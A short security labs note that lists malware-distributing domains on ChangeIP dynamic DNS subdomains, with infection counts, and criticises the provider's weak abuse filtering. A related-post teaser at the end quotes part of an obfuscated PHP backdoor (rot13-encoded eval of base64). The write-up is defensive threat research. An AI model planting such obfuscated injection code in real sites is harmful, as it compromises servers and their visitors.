ChangeIP (dynamic DNS) malware

Labs Note

If you look at the top domains distributing malware for the last days (and months), whatdo you see in common?

#numberofsitesinfected #type #malwaredomain
650 iframe  http://cvrtyi.ddns.info/nighttrend.cgi?8
315 iframe  http://byiegfs.ddns.info/nighttrend.cgi?8
275 iframe  http://ileshdg.qhigh.com/nighttrend.cgi?8
179 iframe  http://sdcmd.freewww.info/nighttrend.cgi?8
159 iframe  http://lmybv.ddns.name/nighttrend.cgi?8
148 iframe  http://wstckewb.freewww.biz/nighttrend.cgi?8
146 iframe  http://zqajsv.qhigh.com/nighttrend.cgi?8
126 iframe  http://avvof.sellClassics.com/nighttrend.cgi?8
116 iframe  http://wnevt.pcanywhere.net/nighttrend.cgi?8
101 iframe  http://acijwfr.freewww.info/nighttrend.cgi?8
93  iframe  http://cqcsk.ddns.name/facebook.cgi?8
84  iframe  http://thcolxbbt.qhigh.com/facebook.cgi?8
77  iframe  http://bwnzgtv.qhigh.com/facebook.cgi?8
74  iframe  http://anmvmhz.ddns.info/facebook.cgi?8
73  iframe  http://hbuwmx.myddns.com/facebook.cgi?8
72  iframe  http://qizkfd.mynumber.org/facebook.cgi?8

Most of them are using a ChangeIP.com (dynamic DNS) sub domain as the first level of injection. Just check ddns.info, qhigh.com,mynumber.org, pcanywhere.net, etc, etc. They are all part of: http://www.changeip.com/. Just in the last 60 days, weidentified more than 15,000 different sub domains from them being used to distribute malware.

Don\’t get us wrong, Dynamic DNS is a very useful service, but we would love if they would implement more serious filtering/blacklistingand some type of captcha to prevent their service from being abused by criminals.

However, in the current state, we can only recommend against using their service to avoid being thrown in the mix with thethousands of malicious domains that they host.

*If you look past 6 months ago, .co.cc was the main domain distributing malware, but since it was shut down, the attackers have migrated to changeip.com. Hopefully they will do something about it.

You May Also Like

CACHE START Russian Spam

We see quite a few sites with the following injected PHP code: //###=CACHE START=### error_reporting(0); $strings = “as”;$strings .= “sert”; @$strings(str_rot13(‘riny(onfr64_qrpbqr(“nJLtXTymp2I0XPEcLaLcXF…skipped…Tyvqwg9”));’)); //###=CACHE END=### This malware…
Read the Post